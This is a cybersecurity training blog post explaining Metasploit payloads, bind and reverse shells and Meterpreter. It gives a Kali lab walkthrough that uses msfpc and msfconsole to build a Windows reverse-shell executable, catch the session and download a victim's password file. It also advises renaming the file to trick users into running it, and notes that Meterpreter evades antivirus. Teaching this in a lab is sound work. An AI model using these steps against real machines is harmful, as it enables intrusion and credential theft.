fbpx

Metasploit Exploitation Tool | MSFvenom Payload Demonstration!

Quick Bite- 01 Payload Introduction, 02 Types of Payload, 03 Step by Step Demonstration
upgrade-normal-command-shell-metasploit-meterpreter.1280x600

In layman terms, exploit is a security attack on a vulnerability. They have potential for a large scale of damage such as install system malware or gain system access or recruit client machines into an existing botnet.

This is accomplished with the help of a payload. The payload is a sequence of code that is executed when the vulnerability is triggered. To make things clear, an Exploit is really broken up into two parts, like so:

EXPLOIT = Vulnerability + Payload

 

The payload is usually written in Assembly Language

Platform and OS dependent.That is a Win32 payload will not work in Linux (even if we are exploiting the same bug)

Different payload types exist and they accomplish different tasks such as:

  1. exec: Execute a command or program on the remote system
  2. download_exec: Download a file from a URL and execute
  3. upload_exec: Upload a local file and execute
  4. adduser: Add user to system accounts

Payloads come in many different flavors and can range from a few lines of code to small applications such as the Meterpreter shell. One should not just automatically jump to the Meterpreter shell. Metasploit contains over 200 different payloads.

However, the most common payload type used with exploits are shellcodes or aka shell payloads.These payloads are very useful because they provide the attacker an interactive shell that can be used to completely control the system remotely

There are two different types of shell payloads:

Bind Shells: A socket is created, a port is bound to it and when an a connection is established to it, it will spawn a shell. The shell lays dormant while awaiting instructions from an attacker.

Reverse Shells: Instead of creating a listening socket, a connection is created to a predefined IP and Port and a shell is then shoveled to the Attacker.

Meterpreter shell

he Meterpreter (short for meta-interpreter) shell, a special type of shell, is the bread and butter of Metasploit. The Meterpreter shell can be added as a payload that is either a bind shell or reverse shell. The Meterpreter is one of the advanced payloads available with the MSF, but you should not look at it as just a payload; rather, view it as an exploit platform that is executed on the remote system. The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system.

Additionally, the Meterpreter allows developers to write their own extensions, in the form of DLL files, which can be uploaded and executed on the remote system. Thus, any programming language in which programs can be compiled into DLLs can be used to develop Meterpreter extensions.

However, the real beauty of the Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system, once exploitation occurs. All commands run through Meterpreter and also execute within the context of the running process. In this manner, it is able to avoid detection by anti-virus systems or basic forensic examinations.

Step-by-step demonstration:

In this blog demo, we are going to try and generate a payload in order to get control of a client Windows machine. I will try to keep this as concise as possible. Let’s get started!

On your Kali virtual machine, go to Exploitation Tools—> MSFvenom Payload Creator

To create a payload, we simply need to state the target type and where to listen. In this case the target is a Windows machine and We will be listening to the Ethernet interface.

Type the following command in terminal: /usr/bin/msfpc windows eth0

Hit enter and a custom payload will be generated which has attacker IP and port number details. The name of the payload need not remain the auto generated name and can be changed to any convenient name that will fool the user to run the .exe file that has been created.

Next we need to start the listener by running the MSF handler file which is the command : msfconsole -q -r ‘/root/filename.rc’ 

The listener will start up and wait for the Windows machine to execute the .exe file.

For demo purposes, I have already loaded the .exe file on windows machine and will now execute it by double click.

Note: The victim and host machines should be on the same LAN network.

As soon as .exe file is run, a session is initiated at the attacker machine. We need to enter the session ID by typing the command: sessions -i 1

With this, the two computers can talk back and forth and the Windows machine can be controlled through this terminal.

In image below: pwd command displays the current directory for my Windows machine

dir command displays all the disrectories with their permissions.

Thus an attacker can search for sensitive information on a victim PC remotely.

For instance, in above image one of the directories is named Passwords and may contain passwords saved in a simple text file. The files can be downloaded on your Kali machine by one simple command: download ‘file1.txt’

Similarly an attacker can edit or upload files to the client machine.

This concludes a basic Metasploit demo where we generated a payload and exploited a victim Windows machine. It is evident that Metasploit provides efficient and easy-to-use tools for exploitation. It is an industry favourite as it lets developers can write their own extensions and is able to avoid detection by anti-virus systems.

About Cybervie

Cybervie provides best cyber security training program in hyderabad, India.This cyber security course enables you to detect vulnerablities of a system, wardoff attacks and manage emergency situations. Taking a proactive approach to security that can help organisations to protect their data, Cybervie has designed its training module based on the cyber security industry requirements with three levels of training in both offensive and defensive manner, and use real time scenarios which can help our students to understand the market up-to its standard certification which is an add on advantage for our students to stand out of competition in an cyber security interview.

More Info – Click Here

Share on facebook
Share on twitter
Share on linkedin
Share on whatsapp

Recent Posts

Follow Us on Youtube

Cyber Security Training Program 2020

Cyber security Course offered by Cybervie prepares students for a path of success in a highly demanding and rapidly growing field of cyber security. The course is completely designed with an adaptable mindset, where the program allows the student to complete the course work at their own pace while being able to complete weekly assignments. Hence, also making it convenient for busy working professionals to pursue the training to help them advance their career in cyber security.

Cybervie has designed the training module based on the cyber security industry requirements in both offensive and defensive manner, using real time scenarios which help our students to understand the market standards.

Sign up for our Newsletter

Interested in Cyber Security Training Program 2020 – Click Here